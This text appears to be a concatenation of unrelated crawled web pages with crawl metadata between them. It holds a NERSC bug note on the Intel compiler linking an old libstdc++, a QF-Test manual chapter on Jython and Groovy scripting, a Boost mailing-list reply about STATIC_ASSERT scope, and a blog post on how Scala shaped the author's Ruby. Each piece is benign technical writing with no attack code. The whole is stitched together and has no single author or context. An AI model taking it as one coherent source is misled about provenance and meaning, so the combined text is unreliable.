refinedweb
588
50.84
Intel uses very old version of libstdc++ by default [updated] January 15, 2014 by Mike Stewart, NERSC USG Status: Reported to Cray as case 84319, became bug 806610. Updated October 13, 2014 by Scott French, NERSC USG When PrgEnv-intel is loaded, the Intel compiler gets libstdc++ from on the default environment on the login node, which is typically quite old. This test case illustrates the problem on Edison: > cat TestLibVersion.C #include <iostream> int main() { std::cout<<"libstdc++ version is "<< __GLIBCXX__ << std::endl; } > CC -o libver -std=c++11 TestLibVersion.C > ./libver libstdc++ version is 20091019 The workaround suggested by Cray is to load a recent version of the GNU compilers (i.e. the gcc module, not the PrgEnv-gnu module), which adds the newer libstdc++ to the environment and makes it accessible to Intel. For example, on Edison: > module load gcc > CC -o libver -std=c++11 TestLibVersion.C > ./libver libstdc++ version is 20141030
http://www.nersc.gov/users/software/compilers/intel-fortran-c-and-c/intel-bug-reports/intel-uses-very-old-version-of-libstdc-by-default/
CC-MAIN-2017-51
refinedweb
156
53.31
From: Aleksey Gurtovoy (alexy_at_[hidden]) Date: 2001-11-24 13:28:34 Andrei Alexandrescu wrote: > > The above STATIC_ASSERT_MSG macro can only be used in > > function scope which highly limits its use. IMHO, an industry > > strength STATIC_CHECK must be usable at: > > - namespace, > > - class, and > > - function scope. > > I know. The current STATIC_ASSERT has the same drawback. It doesn't. From: "Note that if the condition is true, then the macro will generate neither code nor data - and the macro can also be used at either namespace, class or function scope. When used in a template, the static assertion will be evaluated at the time the template is instantiated; this is particularly useful for validating template parameters." > > So, use "do {...} while (0)" instead of "{ ... }". > > I thought this is self-understood as it is a well-known idiom > for creating macros. I was actually surprised to see that boost doesn't > apply this idiom all over, and I was going to complain about that. > > So by this message I am complaining :o). The idiom is not used in BOOST_STATIC_ASSERT because it would limit the macro applicability to one particular scope. -- Aleksey Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk
https://lists.boost.org/Archives/boost/2001/11/20386.php
CC-MAIN-2019-13
refinedweb
209
66.84
![if gte IE 9]><![endif]> After typing a class name, add a context menu to add the corresponding USING entry for the class based on the assemblies referenced by the project. BONUS: Add a context menu to allow stripping the namespace from fully specified class and create the corresponding USING entry. Existing functionality. +1 Is that still needed post 11.4? 11.4 can insert USINGs for you while providing content assist. @Mike: It would still be useful to have this a batch functionality on a set of sources (i.e. replace all fully qualified class references by the name + add necessary using statements). But you're right, the "Organize usings" functionality, and the automatic adding of USING statements has already filled a large part of the gap here... I'm still yet to see "Automatically add USING instead of qualified name" actually work on my 11.5 install. It's a hit-or-miss feature. My request is actually doing things in reverse - "I don't know the exact namespace, but I know my class name. Search for me all possible USINGs." "My request is actually doing things in reverse - "I don't know the exact namespace, but I know my class name. Search for me all possible USINGs." " - Currently this request can be achieved using following way: Enter class name and press Ctrl+space, content assist lists all options where this class is available with package information. Select the right option from content assist list. The respective USING statement is added at the top.
https://community.progress.com/community_groups/products_enhancements/i/openedge/add_a_feature_to_add_using_entry_given_a_class_name
CC-MAIN-2017-47
refinedweb
256
65.42
view raw I have a 2D char array declared as char A[100][100] char *ptr; ptr = A[5] void func(void *ptr) { int index = ??? } Yes it is possible if you can see A in func (A is just a doubly-indexed 1D array, not a pointer on arrays, that's why it is possible). #include <stdio.h> char A[100][100]; void func(void *ptr) { char *ptrc = (char*)ptr; printf("index %d\n",(ptrc-A[0])/sizeof(A[0])); } int main() { char *ptr = A[5]; func(ptr); } result: index 5 of course, if you pass an unrelated pointer to func you'll have undefined results. Note: it is required to cast the incoming void * pointer to char * or the compiler won't let us diff pointers of incompatible types. EDIT: as I was challenged by chqrlie to compute both indexes, I tried it and it worked: #include <stdio.h> char A[100][100]; void func(void *ptr) { char *ptrc = (char*)ptr; int diff = (ptrc-A[0]); printf("index %d %d\n",diff/sizeof(A[0]),diff % sizeof(A[0])); } int main() { char *ptr = &(A[5][34]); func(ptr); } result: index 5 34
https://codedump.io/share/KZgD2JedwBxJ/1/index-of-element-pointed-to-by-pointer
CC-MAIN-2017-22
refinedweb
193
62.82
Module::PluginFinder - automatically choose the most appropriate plugin module. use Module::PluginFinder; my $finder = Module::PluginFinder->new( search_path => 'MyApp::Plugin', filter => sub { my ( $module, $searchkey ) = @_; $module->can( $searchkey ); }, ); my $ball = $finder->construct( "bounce" ); $ball->bounce(); my $fish = $finder->construct( "swim" ); $fish->swim();. Constructs a new Module::PluginFinder factory object. The constructor will search the module path for all available plugins, as determined by the search_path key and store them. The %args hash must take the following keys: A string declaring the module namespace, or an array reference of module namespaces to search for plugins (passed to Module::Pluggable::Object). In order to specify the way candidate modules are selected, one of the following keys must be supplied. The filter function for determining whether a module is suitable as a plugin The name of a package variable to match against the search key The name of a package method to call to return the type name. The method will be called in scalar context with no arguments; as $type = $module->$typefunc(); If it returns undef or throws an exception, then the module will be ignored Returns the list of module names available to the finder. Search for a plugin module that matches the search key. Returns the name of the first module for which the filter returns true, or undef if no suitable module was found. A value to pass to the stored filter function.. A value to pass to the stored filter function. A list to pass to the class constructor. Perform another search for plugin modules. This method is useful whenever new modules may be present since the object was first constructed. The filter function allows various ways to select plugin modules on different criteria. The following examples indicate a few ways to do this. my $f = Module::PluginFinder->new( search_path => ..., filter => sub { my ( $module, $searchkey ) = @_; return $module->can( $searchkey ); }, ); Each plugin then simply has to implement the required function or method in order to be automatically selected.. The typevar constructor argument generates the filter function automatically. my $f = Module::PluginFinder->new( search_path => ..., typevar => 'PLUGIN_TYPE', ); Each plugin can then declare its type using a normal our scalar variable: our $PLUGIN_TYPE = "my type here"; Paul Evans <leonerd@leonerd.org.uk>
http://search.cpan.org/dist/Module-PluginFinder/lib/Module/PluginFinder.pm
CC-MAIN-2018-22
refinedweb
372
55.34
Manual | Tutorial | Standard Library | Release Notes This section explains technical details about the Jython integration in QF-Test and serves as a reference for the whole API exposed by QF-Test for use in Jython, Groovy and JavaScript scripts. For a more gentle introduction including examples please take a look at chapter 12. The load-path for scripting modules is assembled from various sources in the following order: qftest/qftest-4.4.1/<scriptlanguage> In addition, during 'Server script' or 'SUT script' node execution, the directory of the containing test-suite is prepended to the path. The directory qftest/qftest-4.4.1/<scriptlanguage> contains internal modules of the specific script language. You should not modify these files, since they may change in later versions of QF-Test. The script directory in the user configuration directory is the place to put your own shared modules. These will be left untouched during an update of QF-Test. You can find out your current directory by looking under "Help"->"Info"->"System info". Modules that are specific to a test-suite can also be placed in the same directory as the test-suite. The file extension for all modules must be .py. In Jython you can add additional directories to the load-path by defining the python.path system property. The script languages can also be used to access Java classes and methods beyond the scope of QF-Test by simply importing such classes, e.g. The classes available for import are those on the CLASSPATH during startup of QF-Test or the SUT respectively, all classes of the standard Java API and QF-Test's own classes. For the SUT things also depend on the ClassLoader concept in use. WebStart and Eclipse/RCP in particular make it difficult to import classes directly from the SUT. Additionally, there are plugin directories into which you can simply drop a jar file to make it available to scripts. QF-Test searches for a directory called plugin. You can find out the currently used plugin dir under "Help"->"Info"->"System info" after "dir.plugin". The location of the plugin directory can be overridden with the command line argument -plugindir <directory>. Jar files in the main plugin directory are available to both 'Server script' and 'SUT script' nodes. To make a jar available solely to 'Server scripts' or solely to 'SUT scripts', drop it in the respective sub-directory called qftest or sut instead. In order to be able to import Java packages, Jython maintains a cache of package information. By default this cache is located under qftest/jython/cachedir. If this directory is not writable, jython-cachedir in the user configuration directory is used instead. The location of the directory can be overridden with the python.cachedir system property. When running QF-Test for the first time after installing it, you may see a number of messages of the form *sys-package-mgr*: processing... Later you should see these messages only when jar-files on the CLASSPATH have been modified or new ones added. Sometimes Jython goes into "hiccup mode" and regenerates the cache for some jar-files every time QF-Test or the SUT is started. In that case, simply remove the whole qftest/jython/cachedir or jython-cachedir in the user configuration directory and the problem should go away. During QF-Test and SUT startup an embedded Jython interpreter is created. For QF-Test, the module named qftest is imported, for the SUT the module named qfclient. Both are based on qfcommon which contains shared code. These modules are required to provide the run-context interface and to set up the global namespace. Next the load-path sys.path is searched for your personal initialization files. For QF-Test initialization, the file called qfserver.py is loaded, the file called qfsut.py is used for the SUT. In both cases execfile is used to execute the contents of these files directly in the global namespace instead of loading them as modules. This is much more convenient for an initialization file because everything defined and all modules imported will be directly available to 'Server scripts' and 'SUT scripts'. Note that at initialization time no run-context is available and no test-suite-specific directory is added to sys.path. The environments in which 'Server scripts' or 'SUT scripts' are executed are defined by the global and local namespaces in effect during execution. Namespaces in Jython are dictionaries which serve as containers for global and local variable bindings. The global namespace is shared between all scripts run in the same Jython interpreter. Initially it will contain the classes TestException and UserException, the module qftest or qfclient for QF-Test or the SUT respectively, and everything defined in or imported by qfserver.py or qfsut.py. When assigning a value to a variable declared to be global with the global statement, that variable is added to the global namespace and available to scripts run consecutively. Additionally, QF-Test ensures that all modules imported during script execution are globally available. The local namespace is unique for each script and its lifetime is limited to the script's execution. Upon invocation the local namespace contains rc, the interface to QF-Test's run-context, and true and false bound to 1 and 0 respectively for better integration with QF-Test. Accessing or setting global variables in a different Jython interpreter is enabled through the methods fromServer, fromSUT, toServer and toSUT. The run-context object rc is an interface to the execution state of the currently running test in QF-Test. Providing this wrapper instead of directly exposing QF-Test's Java API leaves us free to change the implementation of QF-Test without affecting the interface for scripts. Following is a list of the methods of the run-context object rc. Note Please note that the Groovy syntax for keyword parameters is different from Jython and requires a ':' instead of '='. The tricky bit is that, for example, rc.logMessage("bla", report=true) is perfectly legal Groovy code yet doesn't have the desired effect. The '=' here is an assignment resulting in the value true, which is simply passed as the second parameter, thus the above is equal to rc.logMessage("bla", true) and the true is passed to dontcompactify instead of report. The correct Groovy version is rc.logMessage("bla", report:true). In some cases there is no run-context available, especially when implementing some of the extension interfaces described in the following sections. The module qf enables logging in those cases and also provides some generally useful methods that can be used without depending on a run-context. Following is a list of the methods of the qf module in alphabetical order. Unless mentioned otherwise, methods are available in Groovy and Jython and for both 'Server script' and 'SUT script' nodes. Note Please note that the Groovy syntax for keyword parameters is different from Jython and requires a ':' instead of '='. The tricky bit is that, for example, qf.logMessage("bla", report=true) is perfectly legal Groovy code yet doesn't have the desired effect. The '=' here is an assignment resulting in the value true, which is simply passed as the second parameter, thus the above is equal to qf.logMessage("bla", true) and the true is passed to dontcompactify instead of report. The correct Groovy version is qf.logMessage("bla", report:true). The Image API provides classes and interfaces to take screenshots, to save or load images or for own image comparisons. For taking screenshots you can use the Jython class ImageWrapper, located in the module imagewrapper.py, which comes with the QF-Test installation. Here is a short sample Jython script demonstrating the usage of the Image API: And the same in Groovy: Following is a list of the methods of the ImageWrapper class. All QF-Test exceptions listed in chapter 38 are automatically imported in Jython scripts and can be used for try/except clauses like try: com = rc.getComponent("someId") except ComponentNotFoundException: ... When working with Groovy you must first import the exception: import de.qfs.apps.qftest.shared.exceptions. ComponentNotFoundException try { com = rc.getComponent("someId") } catch (ComponentNotFoundException) { ... } Only the following exceptions should be raised explicitly from script code (with raise or throw new respectively): UserException("Some message here...")should be used to signal exceptional error conditions. BreakException()or raise BreakException("loopId")can be used to break out of a 'Loop' or 'While' node, either without parameters to break out of the innermost loop or with the QF-Test loop ID parameter to break out of a specific loop with the respective QF-Test ID. ReturnException()or raise ReturnException("value")can be used to return - with or without a value - from a 'Procedure' node, similar to executing a 'Return' node. When working with Jython modules you don't have to restart QF-Test or the SUT after you made changes. You can simply use reload(<modulename>) to load the module anew. Debugging scripts in an embedded Jython interpreter can be tedious. To simplify this task, QF-Test offers an active terminal window for communicating with each interpreter. These terminals are accessible through the »Clients« menu or through »Extras«-»Jython Terminal...«. Alternatively, a network connection can be established to talk remotely to the Jython interpreter - in QF-Test as well as within the SUT - and get an interactive command line. To enable this feature you must use the command line argument -jythonport <number> to set the port number that the Jython interpreter should listen on. For the SUT -jythonport=<port> can be defined in the "Extra" 'Executable parameters' of the 'Start Java SUT client' or 'Start SUT client' node. You can then connect to the Jython interpreter, for example with telnet localhost <port> Combined with Jython's ability to access the full Java API, this is not only useful for debugging scripts but can also be used to debug the SUT itself.
https://www.qfs.de/en/qf-test-manual/lc/manual-en-tech_scripting.html
CC-MAIN-2018-51
refinedweb
1,655
55.34
I recently rolled off of a Scala project and onto a Rails project. I noticed that the Rails that I’ve been writing has changed as a result of learning Scala, so I thought it would be interesting to document some of these changes. Types Systems The most obvious differences are due to Scala’s static type system. Scala is typed language meaning that all variables have a defined or inferred type, and those types are verified for correctness at compile time. Moving from Scala’s type system back to Ruby’s dynamic types has made me more thoughtful about the types that I am passing around. In Scala function definitions are often written in the form of: def add(x: Int, y: Int): Int X, and y are parameters with a type of Int and Int is also the return type. Now when using my add method Scala won’t let me use add with non-integer params. Building off of this example, if for some reason there was a case where I wanted to add two variables but there was a chance that either of those variables could be nil, Scala has a different way of representing that type, and that’s using the option type. Where an option is either None (similar to Ruby’s nil) or an Int. Now our function would look something like this: def add(x: Option[Int], y: Option[Int]): Option[Int] This function definition is now telling us that x or y could be none, or Int. It’s easy in Ruby to forget to think about how your code handles nil cases, whereas Scala forces you to be explicit about when you’re working with a possible None type. Now if we were looking at how I would write that same function in Ruby, I would try to communicate the type information through my naming: def optional_addition(optional_int_1, optional_int_2) The way that I implement optional_addition would also change. While my Ruby def add might error when given nil, I would want def optional_addition to have some logic for handling that nil case. Creating New Types Scala’s type system, similar to most typed languages, can produce clearer more reliable code and the more information that can be encoded into the type system the better. One way to do this in Scala is through the use of case classes. A case class is similar to a model in Rails. They look similar to this: case class Cat(name: String, color: String, gender: Gender) Where Gender might be another case class that only allows a select set of ‘gender values’ . Now we know that every instance of cat will have a name, color and gender. Rails models accomplish similar type guarantees via validations to ensure that attributes and associations are present. Because these are usually only available at the interface with our database, we tend to not have these checks elsewhere in our system. By comparison, in Scala I would create case class for small objects that weren’t necessarily backed by database tables, and were often confined to a small part of my system. While I’ve seen Rails models that aren’t backed by database tables, it feels clunky to create a model for an object which won’t be used very often. Instead I’ve found myself reaching for Ruby’s structs which don’t have a built in mechanism to ensure data/type integrity, but will guarantee that there are the correct number of attributes. Struct.new("Cat", :name, :color, :gender) Struct::Cat.new("Tom", "blue", "female") Collection manipulation To be honest I can’t recall if I had a tendency to favor .each in Ruby, but since learning Scala I definitely have a preference for favoring methods such as .map, and .collect. Scala, similar to Ruby, is a mix of functional and object oriented programming, however the Scala that I’ve been writing has skewed to being more functional. As such I’ve gravitated towards methods such as .map that behave in a more functional way by returning the collection created by applying the block to each element of the collection. I have been avoiding methods used only for side effects, like .each. [1,2,3].each do |b| b + 1 end # Returns: [1,2,3] vs. [1,2,3].map do |b| b + 1 end # Returns: [2,3,4] Wrap Up I’m sure that as I write more Rails, and more Scala, I’ll continue to notice differences in the way that I code, these are just my initial observations. I always find it interesting to watch how my coding evolves as I learn new things, and I hope that this was an interesting reflection.
https://thoughtbot.com/blog/ruby-under-the-influence-of-scala
CC-MAIN-2021-17
refinedweb
790
65.56